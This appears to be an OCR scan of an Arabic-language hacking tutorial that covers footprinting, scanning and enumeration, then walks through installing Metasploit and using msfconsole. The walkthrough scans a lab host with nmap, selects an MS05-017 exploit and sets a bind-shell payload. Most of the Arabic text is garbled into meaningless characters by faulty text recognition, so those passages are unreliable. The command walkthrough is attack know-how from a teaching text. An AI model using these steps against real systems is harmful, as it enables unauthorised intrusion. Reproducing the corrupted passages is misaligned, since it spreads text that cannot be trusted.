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dlS jll ^aljJ La ^^ic I^Aj 6£^J! 11a SjjuiLa^ _)^^J ^1^*^11 J (J^a^illj c^M lalu^VI jjL^J L}J*-a UJ"^ (> — ^ .l3^J-^^ 

ciil jJakll u^V ^^-^ ^ j^j ^script kids l£ jjl^s t . liijljt^ jj^*-^ ls * ^ A ^—^ j l£' l>* ^] j 4 u*'j^ 

Ajjlcl c flUa^H 4jLgi ^ UJ^^ l^J-^"^ Jj'^ ^ 4-jL1aj ^cjJalil tiljj^ ^ 6^JdJ Isisk ^yA tillij ^jli .cilli£ 

(Footprinting) ^5Uai-VI A^fr -l 

^L^jfiV cJf^ lP 3 ^*^ 4_u£ill *>^A Q*. ^ .4 m a <JL^jI a£jjuj Alnj 411x1*11 diULull ^aa^j 4)\aC* j& FoOtprilltillg 

L_aLi ^LauU ^jIj ^1 g &1I <j] 6 Footprinting ^-^-j-* i l^l^aJLuit t^Uaill a $ a\ \ § *\ .4£jjaJI 

djjJjVI <£jJal (J^ila J-all f \ lalLujI j t^naillCSpaCG) pLgjujVI 6 IP (jjjUc (jUaj (Jl* dlLa jl*-* >mll a ^jL^su 

AJjVl 6 J^aaJI ^^A AjlS j-dj ( fl^JI ^J^^ .^Uajlt t * a " - ^all Jallj (jC c ftjjj^ll J^Lk ^ ^aJaill ^1 jlkl <J j^juj (jjud^J FOOtprilltillg 

. Footprinting^ s^j^ll 

CjI^jJoII (jc djUi jix-d j^j^ ^j^V^ ^f^ 1 ^5^* 2^ CP" Whois ^^»l^l ^^j^-j / * a ^^ J jH ajcU^VI 4juji^il ^ ikiLJ i 

(Scanning) u^aiJI ^Iap -2 

ji CjI^jJoJ! ^1 ^iiij q^jxI Uil tiiye hosts ^ L» jl a£^H ^^Jc ^LLJdill ^jjiLjaxJI ^j^jl (^a^ill) Scanning 

c ^j3I (jj^j> ci^ o-o ^Li^LJI dLaikl! J ja. djUi jlx-d till Ping swapj p-Ln^ll cjLijjJ!/iaLL<J! Jla djl^l j^-VI o^ 3 *-? 

^jjJJU V (^11 IP (jJjUc J ja. CjLd jlstxi (ill £-^.JJ 4_Loi£jl!I iaj|^)aJl ^JJJ (J^aail! ^I^>^.j .L^J <j^aLaJI XP U^J^ C 'J ^J^V^ 

(Enumeration) ^1^311 -3 

^Aaluax ^jI <Jla djLd jIslaII ' j^j^ u^^W^^ cl>^ c <^ (j-o (jjjaall l_j jLojI jA (^IaxjII) Enumeration 

( fti>il Ai^laixJI ^jUSVI j^xj ^U-aII jV ^jjjjJa j^Vl liA . (SNMP)<^f^^ fijbj J j£ jjjjj ^Ujj ;4_ia. jjI! Jjl^a. tA£jj^ll 

. banners j tCjl^JajH j j^JI j ^qj^ ^ "u^aW Cjl^jLaui j t^^j/MI ^jc CjLg jIslaII 

^l^)a.] lI^^ ^^'^ st ^^ .^Uaill ^jljlkl AiC ^jJalj JJC. (Jl (j^-<^ Cilia CjIc <ill jl AaJL gall ^^JjoiaII CjULaia. -Ij-laJ ^A ^a>l g <ill c fl^A 

CjVjLa-xJl d^A JlLd (Jja i ^ajL L_fl jjuj A-nllll ^Llaj caJilc _ dj\ jLaifllajVl ^Lia. jlil l^cLjaa.1 j! L_fl^Jl ^Uail <iajaij CjVL^jI 

(j-aa ;<illi ^DNS L&-° 64^lc (jj^J ^3 g aII l^j^LaLj ^3 Ld ^A I^t ^jj ^^jll CjLd jlx-<Jl (jj^J La Ullc. , (Ja i all ClAiLa 

Null Session ^ U^h u^M cr^'j Oj^j IPC$ ^ c> IPC a^jL^ ^ u' o^^^ 



What you have at this stage: 



Footprinting Module 



4S 


IP Range 




■ 


Namespace 




■ 


Employee web 






usage 











Scanning IVIodule 




Enumeration IVtodule 



Intrusive probing 
User lists 
Security flaws 
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.^Uaill s-bl ^glc CjIa^JI S-ljJ <— fll^VI (J^H f^-^ & ^ llA^ 'L&^^J .U^*^ c ><a ^ *^ La <LaJ^. <^-^> (J^ 

<J^Jj-g ^ia^I^xJI L_fll^Al (j^axj <^-^ J J-^?^ ilB^J ,^^1 l— lla^A l_A£jjI (jja-^l g (j-a L_fll^VI (J^asu ^^Jj La (jj^J ^3 



Hacking-Stage 


Goal 


Technique/Exploit Used 


B 


Gaining Access 


To collect enough information 
to gain access 


Password eavesdropping, 
brute forcing 




Escalating Privileges 


lo create a privileged user account 
if the user level is obtained 


Password cracking, 
known exploits 




Executing Applications 


To create and maintain 
backdoor access 


Trojans 


ft 


Hiding Files 


To hide malicious files 


Rootkits 


Covering Tracks 


To hide the presence of 
compromise 


Clearing logs 



(CEH HACKING METHODOLOGY) (CHM) Ai-ajSM 

Jallj j ^ j^g-II (J* Ha^vwaW Alkiall <jC t Lu&ll JI-IaIIIj ScailllillgJ FOOtprilltillg CljLuflJ a\\ t^Uaill <Jj^aj3 Jij 
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^SYSTEM HACKING jt EXPLOITATION JlJiiVI j* U 

q\ ^-aII (j*3 4tilb £A j .^Uaill Jc 6j !n null L_lLuu£l J ^-^11 I to > lall Jatfijl J^UuLujI j& Exploitation tdjl ^ \!n> ^i^ll lajuoJ) (j^ 

c> jl I^jSai Oracle padding exploit ^ Jliull ^ .^Uajll ^ j^JI ls^jj <jl j^' l& 
ja (Exploitation) (jljS^VI j^' ^-Al^ .lW^ lS^j ^UajJt j ^ ■ V 1 * £1 j CjliLJI Jja^l Ul ^-LuJIj CjUj jLlaII 

jikVI (jla ^Ijj ^ . jj j^3l (administrative-level) u? j^V ls ji^JI J j^JI Ujb JL* Jh^\ 

t^i^jJal j (jl ^^-a! .c*L 4_j^Lkj| djI^UaxJl j iiL 4_j^Lkll j-al jVI ^AJJ (jl I^jLuj (j-a 4^-^ J] fl^l jlg-aJl <Jjj^jJ <1 jl^-a 

Exploit ■* « »> ^ t Jalij lJUj£I J tt*SI jjI ^(jji^j Exploit .Exploit cP^M j* (Exploitation) Jl j^VI jli 

L^l Ul £*IjjJJ 4_iL^aVI ^Ua jll jjjxj Ljajl I g j£ aJ .Al^)J LftJ ^b^ll ^^^-Sc IAjU^Ij 4-J>i^ ^1 t jl^-aJI Jjj^j (j£-<uJl 

_ ji&lj (jj-d^Jjai^ AiUial i <Jaxj ^^jII diUi^iJl jjiaaUj t^J^. £c-<ili^)J CIujjj (JIa Jj-«VI (j>» (_^U ^IjaII 

(jC C allkj ^Uaj J£ ^ "J trt J ( ; .^J^^ ^ C5^^ J J - ^ <J^I J-^l J^' (J -0 J (^(Exploitation) (J^ J^^l AjIaC 

AiliLxJ! Jjijuall A <Jai\ .L_fl^A c^lA (j-d t allkj tiL* j^Aj 4(J-ol ^xJl (j-a jfllj ^^c ^^ic bUuel jj (jxi t^^A J^J J^-VI 
^Uaj J£ <La^]| (jjjil! ^L Jj1\ (jj-^l^JI .lIjU^JI (j^ 4 atl^ ^ lei jj) c . illajj Ak\"\\ a\\ CjUIaslSI j t^qVi^ a\\ djLd^kJI j ^(OSs) 

J£ Jjia (jl jlkVl (jc Uj^j lij Jallj j ^-xJaj^U cilia^stxi £Jjuj j!i3 ^Uaj L_fl jjuoS t^^Aill jk tiljl jl^ jl jaLojI ^l^J^lxlajl (jjl jl^J 

.(jljikVI CjIj^I ^a! (j^ sbVI metasploit ^ ^c^ 1 



METASPLOIT 5.2 



.4_L^a!jal3 4_J\iL(JI sbVl ^ . JjJaLJI Metasploit ^ j^j ct^Ij s- 5 ^! ^ ^Ij^Vl c>» 

(_5^ j 6l_jU^3I b^ <J ^Ajoui Ajla y^jti *c>\^\ ^ jjl ^>iixj iiljoi uj^ cl>^ j ^— jI j^i cJ-^^j 'cP^^ J^>^l J *^ 
l^J ^jjujj jjoj sbVI .6^1^. Igii t^JI C5 ic ISwordfish u^^^ cjlj^-VI ^ cjVI^JI lP 3 *^ ^ 

liA U£l j l^llA^V IjJaJ l^ic- ^Klj U^V Jxil£ 

6 j^aU^ I jla&i ^JUJI I j > (Spoonm) ^j^-j (HP Moore ) l9 jj* ls^ cffi t> ^ 'Defcon 12 ^ '2004 ^ ^ 
jUa) ."(Exploit Frameworks) Jtj^Vl cjIjLL! » ^jxJI b^ >^ ."^Vt J 1*1 <L*J1\ :Metasploit" u> 
(> 4-ixm3l ^Luj (framework) jtSfl .exploit cP^Mj j^j^ ^j^j <^ (exploit framework) Jtj^VI 

.Exploit Jl j^^l ajIao ^ obi Lgijj^j ^L I^jUI^J J^l£ Si \$\<>\ j t^j/Ml ^Ic <^xK ^Ui CjI^j Metasploit 
(Jjjaij Lajj (j^lj a alia a (jial jc-V a alia o ( fljl jll (j>i CjI jjojl!! Jaoij CjIj^VI (j-« o Jc ^al jll ^jii^j IVIetasploit 

AijJIj ajjUI (Exploit Frameworks) Jlj&yi <^jIjLLJa1j^ 
(JjjL ^ ^sj^LaII ^Ij^VI jjj^ c> i j'^^j u' iu^w j udj^ c>^l J uj^yi 'Metasploit 2' ^ 
'^jW^ <^^JI (Exploit Frameworks) c> u^' c> j u' ^' j' payloadsj exploit ( alik^ ^ ( ^qfl l 
c^LiiU jSlj .U^b ^ ,J ^U13 o^Uj (j^ui^ (jjjUk IjAxj Ua^£j . ImmunitySec's CANVAS J CORE Impact 

<J jll (j-«Vl cJW^ (jg& dh^yi «^3«^*ll ^ ls^" ^"^ '>~' )A ^ 6 ^ ^1 ^Viml j (j^>j^ j!i3l (jli 

Ai^al jSII (> cJ^ j^^Jl £ jSi* (Exploit Frameworks) ^1 ^ jVI s I^jV j^l c> Metasploit 

^ ^j^^ (Exploit Frameworks) 6 ^j^I *^ >^ ^ cP*^ ^ j -W) l3' J^-^ lS jp^j 

.^W^ ^ W^^j 'Exploit j^j^j uj^ 5 
U-^j clA^ V j J^Ull aLIS Payloads .payloads c> j <^ ox c> j^VI j ^^Sl jUikU Metasploit 
j^JI b^ .t V^im^l jl^aJI Jc 4 qjq^i ^jjj ^ilt til jIjoJI J j> "^jflUial t ^ h j" Payloads .^^^^Exploit ^ 
AiLiaj ^n«Ji jSSVl payloads J Metasploit lU^ "^aJ^ s jki^ ^ill jl^aJI J^ jVI J^i : JI>JI 

Metasploit payloads J ilalSlI j .ci^JI JU^^ ^ j 'backdoor ^ j 4^ u^ ^^^ 
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< *^ > ^ t Jalij o-a^lij Metasploit o£ <ij^t ^ 'Metasploit ^l^i^l ^ JjS 

<jl£ til Ai^stxJ Ja^a (jSa^ <— i jjuj ^j-a^lall a axjjal) Jalij (jrQ^li ^^kjjoij LoAk- tdiVl^Jl ^ ^ .(Vulnerability scanner) 

£>i& ^^kioij jULkl c^jj V cjIj^Vi oiA . Jl jikl CjIj^I ^ Framework c> ^ j^j Metasploit ^ ^ J^*j 

^j^j j <Lua^li i buJaH Jallj <jc ^^jj (Vulnerability scanner) c JalSj <j-a^ia .cJ^JI C5 i*i3l jljikVI JL£V cjI j^VI 



.11a tdji (j-d .4j^a^ij ^ill ^Uail! ^jljlklj L_a*jja3l iaUj J^UIojI 5U£ Jj^j Metasploit .J^J^ 
^Ull jj Cjajll ^> I I j^a (HD Moore) l9 jj* ls^ cs-^ .Rapid 7 c> Metasploit ^ '2009 ^ 
tilli Uij SjjjSII ajjL^jII l— il aaiftll ^ ^jAxJI ^jc ^IjaVl ^2 (j^JI aIq ^t. jll ^^Jc .ULa^ Jlaj l_s jjoj Metasploit 
Metasploit c^j (HD Moore) lsjj* ls* u^j 'Metasploit Proj Metasploit Express 

^jXl* .Metasploit ^jj^ll Rapid 7 Metasploit *l>5 <£*L^ .^W^j y?^^ 

:<^UJt jSj^JI (> UL^4 LfLAAj (^Sju Metasploit 

http://www.metasploit.com/ 

j 'Metasploit (jjiail (> ^j^xJI ^Ua .<j Ulxi c^i* Metasploit 'c^^ J^jSjII ^Uaj ^ ^" .. n lij 

^j^aj .msfconsole cr^^ j 6 ^ ^ lt^^ ^ (GUI) j^j ^ im^l ^-^.1 j t^l.^ iml l_jU^3I 11a j^jjjoj 

.^l^kioaVI lU^j '^j^ msfconsole ^ 

£±\j)hW\ ^Uj) ^JjLuJ) ^Sj^il (j-^ JJ^J^ 4 a\\ Metasploit^^-^ Jj f JJ^J J^^l ^Uall AauuIL La) 

b jjJjjj JjLulUI ^UaJ Ajjjjj ^LajV 4alUlj 

^Ljaxi ^<ilj^)jj ajU^JI l!^*^ ^ IVIetasploit jj^j^^ ^cjouI (j^>> jIa^VI lSj^^^j ^W^^ - 1 
;4_JU3I 4_JjU!oil Jj^aj C5 ia k ciiifull ajLc- ^ Wizard y^ ^ ^b^^'j ^ill Installer 2 -2 

IJp S€tup I = 



DiableAnti-VirusI *** 

This product n not com pjtiblc viibh com man anti-virus solutions. Eric re c ontin uing, 
pirj-sr diublcany inxtdlled nnb-virui aofhvart or ddd en rxcluiinn for the Meba&plciic 

in ibjllntion directory- Failure -to do so con lead to 0 cc-rrupt installation and the 
malfunctioning of certain ocploit modulES, 

Disable R recall! *** 

This pruduot ii not com patible wbh common firewall jppli-: alien s. Although ib is poisible 
to use Metasploit with a fireuuall in place, s -fireball will interfere with the -function cf 

certain ofpJorb and payloads. Please ensure th^t your firewall is disab/led prior to using this 
product tor a pEnetraticntest. 



BitRock Installer - 



< Back 



Next> 



Cane el 



,4jU^JI l!^*-^ ^IjJI <jU cil^^j <ULaij 
^iid J^^j .(jjil^MI ^LaAaajujj L_a jjoj ^ill m\a\\ ^jJa j ajs tilid ^jjj (_^^>^.l ^1 L-i^ij ^^jII j Next C3J^ ^ 
jl£ li] . HTTPSJ 3790 ^1 ^ f^^J *^ -Next tija ^ Metasploit ^oii^ ^ SSL 

iflio JLij] iilj£«J jl t^jlasiJI (jlc. j ifliall lift ^ylc ^LaLuVI ^JJ AjLaC. (jlS lij Ls iliaj i(JJ±\ <jl«C. ala iiiall 

.442 ji 8080 l-S Jjjill lj* c> >l 
.Finish l3j^ ciujiuli ^I^jjVI ^jcj Next ^ 4_LJaljjaVl CjI^I^cVI ^j^j 

i^Vl^ t*Ui j Metasploit J^-^ u^ 1 e j£ 



-5 
-6 
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Start > Programs > Metasploit > Access Metasploit UI 



J h OJ^ URL u» j> 

:(j2VlS add exception iLiliil ^ -7 



This Connection is Untrusted 

You have asked Firef ox to- connect securely to local host: 3 7 9-t>. bLit we can't confirm that you r 
connection is secure. 

Normally, wh en yo u try to connect securely, sites will presenttruited i d entif i cati on to p rove tJh at yo u 
are going to the right place. However, this site's identity can't be verified. 

What Should I Do? 

[f you usually connect to this >ite without prob-l em :-, this error could mean that someone is trying to 
impersonate the 5 i tc. and t o i_i ihculdn t ccntinue 



Get me out of here 1 



I Understand the Rislrs 

[fyo-u undErstand what's going on, you can tell Fircfoxto start trusting this site's i dentrfit atio n . Eve 
you trust the site, this error could meanthkat sorneoriie is tamperirig with your cr. 



Don't add an eitceptic 
identification. 



s you knoi^ then 



l why this site doesn t use trusted 



Add Exception- 



2 



l^>\ \ A l -n. \ \ l " \ \ \ \ \\\ \ \ ^^a> ^y^- i 4_jujLjuj ^^_laJ — ^ 



MASTERING THE METASPLOIT CONSOLE (MSFCONSOLE) 



CjUUj s^&IS s jhV J jVI fULJl ^ msfconsole ^^^1 ^ .(msfconsole) Metasploit chj^ j*^ 

msfconsole j^VI (j^lj&V i^JuJ j$i .Metasploit ^->l^j J^Mj ojjSjj 'Metasploit 

.lfe.Ua (j^aLaJl exploit (J^ 3 ) ^ ^ ^n^J c fl^J) c aUa^&ll jL^ajl ^^Jc 

i^JUll jLluJI JUk^jj JU* jsll ^ia J^Lk jfe msfconsole J] Jj^j^ J^l 

#msfconsole 

. Jli* jjII gi msfgui -M^S ci^j^ t*Uij a^j^jII AiJI ^ Metasploit J^ul csj^ 
30 j a_i>^ 10 ^ ci^*^ msfconsole Cjllnkill 3^j13 J!^k ^ msfconsole J] Jj^j^ ^ 

AjaV ^£1 ^j^j J^U. (j* Metasploit ^ tciUaJl ajI^j .djlk^J ^UaJ cj^j ^3 lij j^Ml ^ch V cillil ca^Ij 
4_JjLi3! lil ^yt-nJall tillil tUj| j.>.V> l^jjajc ^jj c _^j3I ^ alia «1\ Metasploit djlja^UI ^ ^jaxJ! cilUfej .[msf>]cii^xJI < . jj 

i^Vli j^i Metasploit U ^jSfl ^l^Jl 



: — # msfconsole 

MMMMMMMMMMMMMMMMMMMMMMMM 



MMMMMMMMMMM MMMMMMMMMM 
MMMN$ vMMMM 
MMMMM MMMMM 
MMMMMMMN NMMMMMMM 

MMMMMMMMMM MMMMMMMMMM 

MMMMMMMMMMM MMMMM MMMMM MM 
MMMMMMMMMMMM MMMMMMMMMMM 
MMMMM MMMMMMM MMMMM 

MMMMM MMMMMMM MMMMM 

MMMMM MMMMMMM MMMMM 

WMMMM MMMMMMM MHHM# 

iHHHH MMMMM 
" ?HHH MMMM 
?HH HH? 



Irt-tp : //metasploit .pro 



Easy p hishing : Set 
±n Metasploit Pro's 



up erna±"L templates, "Landing pages and "Listeners 
; wizard — type 'go pro" to "Launch it now. 



= [ metasploit v-4 . 
-=[ 1053 exploits 
-=[ 275 payloads 



3 .0-dev [co re : A . 6 api : 1 .3] 
590 auxiliary - 174 post 
28 encoders - S nops 
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L£ .iaAiall nopsj ^encoders 'payloads 'Exploits ^ ^ <*j* J jV Metasploit ^ Ja^V ^l^a ^ 

^jl m l$Ajq1\ Jjj-<u3I j ^'i^ a\\ iaLaijj ^IMetasploit t . v mi j .ti-u^jli ^kl ^ ^ Ivi ^jl (j£-oj 

. Jll* jj3I J JU1I ^Vl JU.^1 (Jjjla (jc- ^j^j ^ jW^j .f ^ ^-J^^ Metasploit Jc- fc*U" 

#msfupdate 

;t_fl^JI ^j^j < Metasploit ^ l^i^l J^l c> .sl^VI *>i& ^1 jj lJI ££U I^j U j&j ^Metasploit jl a*j jVI 

t> ftjlaa. <J£J J^^t lP 3 .exploit J^-^ ^ J j^aaJ I lA^j J^ payloadsj 'exploit 
j!>UujajVl c^Luj dja j J j£i La£ .Metasploit ^i*>> CjLiujLajl ^ajxluoj U jco ttilli <Jii (j£J j t<Lla cj! J CjI Ja^JI £>i& 

^Uaill Jc; ^-J.^ jJxll til jLJl (jiasu V t Ui, J ^ J^Vl oi* .Aisu ^Uaj Jl Ig-LoijJ ^JJ jllj ajAUJI ^1 jSVl J^ J jj^aaJI jfc (exploit) 

ciiiiij Jl* ^l^xJI o^axj pbV ^>ikiujj jll ^1 (j* Sj^ * - ^ 5JjS Liajl payloads uW .payloads ^lil ^ lJ^I 

> v^l ^UaJI Jc backdoor j» (j-i^^yin^ pLuijjj ^Ujj 
(payloads) CP ^jSSft ^jjj 4-*^VI(exploit) J^Aj u^W^ ( ' qT > ^ ^{vulnerabilities) < <» > ^ l 

iaj aS jljlkl J sa^J j c flA^J) ^Uaill Jc Ia jjaj ^31 c ajl la j jl AjflLjaj ^ Payloads > ^'M^ LS^* 
.<j^UJI exploit jj^^ ^ J ^ s ^ -payloadsj exploit c> ctl^t aaxJI J jj^iL ^J! ql^ISII 

Jaxj Sbl (JJJjAj L_fl jjoj 6<Jj^ill J li^V .lllJuj (Jj^aaJ (jl J-dl Jc ^U^C <L^)iaJ L_flA^Jl AjJa exploit C5^J J UJ^ ^' q J 

. JJij t*Ui ^ jjSj ji (jVl (jSl j Aijjiall 

l^Vti ^ MSFCONSOLE f^ll & He t^ikiyJ ti>yi g^l AjuUIII j^ljSH o^ju 

.l^La JjUj y-31! j^ljbU Sa&LuiJI CjUL o^^xj till ^joij j^Vl Iaa :[help/?] 
Ujlikj ^ill (module) s^jll ^1 <^^1 >»Vl Iaa ^ :[use module] 
.SjljauJI (module) ^jl Silik^ll CjIjU^II aja^j! j^Vl Iaa till ^c^j :[set option_name module] 

.(exploit module) c^j 1 ^ Iaa : [exploit] 

.(non-exploit module) $ ji^^l 4^^^ ^ j^Vl ^jIa^ jll Jji^ Jl ^ajj j^VI Iaa :[run] 

.Aj^ja sa^j ci^U ^ill j^Vl liA : [search module] 
.MSFCONSOLE c> g jj^ ^ =[exit] 
^ .nmap J ping ajJ^Vi Jjij^ll ^Uaj j^lj ^I^aIujU till lJjjuj msfconsole 'Metasploit JJ 

(j^a^il nmap ^^*>^ ^ j^j j J^aJ s <J jl J ,^£^j1I SAav j tiljli ^jl ^jj^ <±L£j j^)3l ^1^>JI Ajiiil (jj^^l $ M ^.<u.uj <jV AjLd 

.XML ^ ^l^iuiU Metasploit JJ J\ a^UaW a<*u*\\ 

MSFCONSOLE f bai-t* AjW LilL jVI ^ 

J o^aI^JI exploit ^W^V j ^W^V ^^-^ cl>^ ^Uac <Ljaj l^a^JI Ajja exploit cJ^ C5^J ^ja^j 
'Metasploit exploit J < ^al l Jallj iajj J^l ^> .^^11 ^Lkjll J Aij^ll < ^ > ^ l JalSj <L1U Metasploit 

Nessus j^j^ J^ j^j^^ cJ^a* ^ ^uIaslII ^aa IaaIuj (Scanning) ^1511 s J^aJI u -0 W^J ^ > ^ ^jllill <x^.l j-<J o^ 3 * 
a^j\1 U3 jajjj t axjjal l JalSj o-^^ I ^a^j (jL dii^ ."nmap -script vuln <target> " OpenVAS J 
{fil j djUa^LJ! ^SIjII tilile t . t OpenVAS Nessus j^j c>al^>»^l b sj jiLJI (j^Ull jl 5i j^>»-a1I c^jjall Jalaj 

Jallil exploit (J^>J>^>^*i <i^^3l ^ t^^Jl .(j-aLa. ^Uu^l 1^1 (jj^J (jl i ; laj "Aj-^VI ^Ib" j) "aJIc" IgjU CllL^a j jll ^cjlUll 

.C-i^JI J laill J 6^^x11 t flxjJall 

^Uaj cjli <ll ^j^?JI L_fl^JI Iaa jl ciljia-j Nmap J^-^ .[192.168.1.104] IP ^ o^j^ 

nmap OpenVAS jt Nessus J^-^ 6^ '2 ^ JaiJI J ^Luj .J*A* jj^ jI^j XP Service pack 3 jj^jj 

.< axjJall JalSj CP J^J^ ^iljUa^V tilli j C-i^Jl J^ 

; JVI£ L-i^J! ^ djU^kll jjj^j ^Ik^V msfconsole ^l.^^^ lJ^JI 11a Jc; Nmap ^^j^ J ^^ j -1 
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msf > nmap -n -oX my . xml 192.168.1.165 

[ * ] exec: nmap -n -oX my . xml 192 . 168 . 1 . 1Q5 



Starting Nmap 6.40 ( http://nmap.org ) at 2Q14-04-24 37 : 56 EDT 
Nmap scan report for 192 . 168 . 1 . 1G5 
Host is up (e.Q0G53s latency). 
Not shown: 996 closed ports 
PORT STATE SERVICE 

1 3 5 / 1 c p open m s r p c 
139/tcp open netbios-ssn 
445/tcp open microsoft -ds 
2869/t c p open icslap 

MAC Address: S3 : GC : 29 : 79 : 3F : 68 (VMware) 



lEBMl HOGG ODES 



Nmap done: 1 IP address (1 host up) scanned in 11.22 seconds 
msf | 
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jjU iiUi j my. xml xml c ^ ^aaill ^cjU \ *ihq^ ^ l^^JI ^Uaill ^j^^qi LLaii 
.oUUiji ^ill xml ^l^ki^U Metasploit ^ nmap i> gftall ^ ^ f 


-2 
-3 


mst 

[-] 

msf 


> db_import my.xmL 
Database not connected 

1 










-4 


msf 

[*] 

msf 


> db_status 
postgresql selectee 
> 


no connection 










-5 



root@ka 
Configu 
Creatin 
Creatin 
insserv 
insserv 



service postgresql start 
Starting PostgreSQL 9.1 database server: main. 

service metasploit start 
ring Metasploit . . . 

g metasploit database user 'msf3'... 
g metasploit database 'msf 3'... 

: warning: current start runlevel(s) (empty) of script "metasploit' 
: warning: current stop runlevel (s) (9123456) of script "metas 
Starting Metasploit rpc server: prosve. 
Starting Metasploit web server: thin. 
Starting Metasploit worker: worker. 



overrides 
ploit ' ove 



LSB de 
rrides 



faults (2 3 4 
LSB defaults 



5) . 

(O 1 6) 



db_status f3 msfconsole ^ i> -6 



msf > db_status 

[*] postgresql connected to msf3 
msf > 



i) (JS ^Ubu ui^dufl JjLiUI Si^t ±& 4Jt 4ijjks Metasploitj postgresql <^ ^ ^1 :4iajal* 

.update-rc.d 



#update-rc.d©postgresql©enable 
#update-rc.d©metasploit©enable 



\JN£ metasploit ^ nmap j*VI jjU jrlj^L jVI ^jSj -7 



msf 


> db_import my. xml 




[*] 


Importing 'Nmap XML 1 data 




[*] 


Import: Parsing with 1 Nokogiri 


vl .6.0' 


[*] 


Importing host 192.168.1.105 




[*] 


Successfully imported /root/my 


.xml 


msf 


>■ 





.nmap <jJ Metasploitj uVI .^^^ Uj^ ^ j^VI <^ J\ ^ill j hosts o-^^ f j* 3 -8 
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if > hosts 



Hosts 



address 



name os_name os_flavor os_sp purpose info comments 



192.168.1 .165 00:0C:29:79:3F:68 



if >l 



Unknown 



icPVlS services j*VI ^l^i^U tdli metasploit ^ ^ ^H<^ CjU^JI a^jJ -9 



sf > services 



Services 



port proto name 



192.168.1.1G5 135 tcp 

192.168.1 .105 139 tcp 

192.168.1 .105 445 tcp 

192.168.1.105 2869 tcp 



state info 



msrpc open 

netbios-ssn open 

microsoft -ds open 

icslap open 



I^VIS metasploit *ic>\& Jt j-aVt ^cjU J^Mj nmap o-^^ill j A I > n\ t (jiijIa^Jt < ^ *j -10 



msf > db_nmap -n -A 192 . 168 . 1 . 105 

[*] Nmap: Starting Nmap 6.40 ( http://nmap.org ) at 2014-04-24 09:19 EDT 

[*] Nmap: Nmap scan report for 192.168.1.105 

[*] Nmap: Host is up (0.00052s latency). 

[*] Nmap: Not shown: 996 closed ports 

[*] Nmap: PORT STATE SERVICE VERSION 

[ + ] Nmap: 135/tcp open msrpc Microsoft Windows RPC 

[*] Nmap: 139/tcp open netbios-ssn 



hosts uo*^ ^Ia^LujLj aj a^\^\\ djljUJI s^ctaj <L^a3l dti ciLa jIslxJI ajJ Metasploit u' l5'^ ^ ^'^j ^ -11 

ic^VlS services j 



nnst > hosts 



address 



192.168.1 .105 00:0C:29:79:3F:68 



name os name 



os_flavor os_sp purpose info comments 



Microsoft Windows XP 



device 



msf > services 



bervices 



port proto name 



192.168.1.105 135 tcp 

192.168.1.105 139 tcp 

192.168.1.105 445 tcp 

192.168.1.105 2869 tcp 



state info 



msrpc open Microsoft Windows RPC 

netbios-ssn open 

microsoft -ds open Microsoft Windows XP microsoft -ds 

http open Microsoft HTTPAPI httpd 1.0 SSDP/UPnP 



exploit gjWi >» n U£ tit U jj U j&j .msrpc <^^JI f. v^ > nj u^^l] ^Ikilt jt ilia services ^^.-12 

^t SjjjjJalU £"tlaJ V t^JLaJt £>i& ^ ^qjq^lt 4-1} jJt <La^lg_-a XlC 4it Ja^-iU (jt ^-xJt <j-a .tilli <j-a S^liluiVtj ti& 

L_JJj3t <J-a*J <^j3t £c-at^)Jt £J**^ (j-a ^qj'q^t ^\ £ a\\ q\ L_ .dljjljyt 4£jjui ( fl* > >i <Jaij <Jilxlajt jl^-a 
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^l^kiujl JjJaij .< fl^i^aj Uiajl jl ^ail .msrpc m <*hA\ exploit c> ls search ^ 

\jila1\ ^3^11. excellent <■ fo^ti t j^t 



http://www.metasploit.com/modules/exploit/ 



msf > search HSS 
Matching Modules 



rs/nn n n ncnnnr? 

Dsure Date Rank Desc rip 



exploit/windows/dcerpc/ms05_017_msmq 2005-04-12 00:00:66 UTC good Microsoft Message Queueing Service Path Overt 
exploit/windows/dcerpc/ms05_017_msmq 2005-04-12 0O:0O:00 UTC good Microsoft Message Queueing Service Path Overt 



:<JN\£ ms05_017_msmq <-ij^ - 1 4 



msf > use exploit /windows/dcerpc/msG5_G17_msmq 
msf exploit (ms05_017_msmq) > | 



tilli (Jjtij j 

show options j*Vl .1 



UjUlkl i^il ^j-<i (j£-<uj <jl ci^ AjjUa^JI CjLd jlx-<JI L* (_^^>j (jl ^1 ^jaJfl ^exploit ^-^^ ^^>^^ -15 
^Aj^aj IaaiL >n c _^j3I payloads j^-^j ^j^-V^ ls* 4-jjiIa>Jl CjljLikjl .ip^j l^^A 3 



nsf exploit (ms05_017_msmq) > show options 
Module options (exploit/windows/dcerpc/msG5_G17_msmq) : 
Name Current Setting Required Description 



HNAME 
RHOST 

RPORT 2163 



Exploit target: 



The NetBIOS hostname of the target 
The target address 
The target port 



an mum 



Id Name 



G Windows 2Q06 ALL / Windows XP SP0-SP1 [English) 



sf exploit [msG5_G17_msmq) > | 



^ j .ci^JI < ii . vmtt IP jA RHOST. RHOST JM J\ M^? iai li* t> ^ J 
jUik^U s^^tlo payloads t> uj^j U?j .payloads ^ t^jj payloads 3J><^J1 1^1 

.show payloads j*Vl j^j t^H^I payloads .W^ t> 



msf exploit (ms05_017_msmq) > show payloads 
Compatible Payloads 



generic/custom 
gene ric/debug_t rap 
generic / s h el 1 _b i n d_t c p 
gene ric/shell_reve rse_tcp 

gene ric/tight_l° 0 P 
windows/adduser 

windows/dllinj ect/bind_ipv6_tcp 
( IPv6) 



osure Date Rank Description 

_\oiJ^lJ^ustom Payload 

normal Generic x86 Debug Trap 

normal Generic Command Shell, Bind TCP Inline 

normal Generic Command Shell, Reverse TCP Inlin 

normal Generic x86 Tight Loop 

normal Windows Execute net user /ADD 

normal Reflective DLL Injection, Bind TCP Stage 
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.set PAYLOAD j*V! <a\^U^ payloads ^ £^ ^ Payloads ^jj 



msf exploit [msG5_G17_msmq] > set PAYLOAD gene ric/shell_bind_tcp 
PAYLOAD => generic/shsll_bind tcp 
msf exploit {ms05_017_msmq] > | 



.exploit J ^^ j f ^Alh <^ ^l^l^c-VI j c> ^W^^ ^-18 
i^JUll j^VI ^ Jli^j^l ^Sa JjjL ^ metasploit ^ . 1 

#msfconsole 

.o- 3 ^ J^J^ ^j^j^I <i«jja3 l <L£> JjUj ^1 ( j.nl uti exploit cp- ^Uij metasploit ^ search j^VI ^ v^ .. n .2 
msf> search missingpatchnumber (or CVE) 

.^j 2 cs^ exploit use j^VI ^^Luj .3 

msf> use exploit name and path 

.^UJ! payloads show payloads ^^Luj .4 

msf> show payloads 

.payloads set >»VI ^^Luj .5 

msf> set payload path_to_payload 

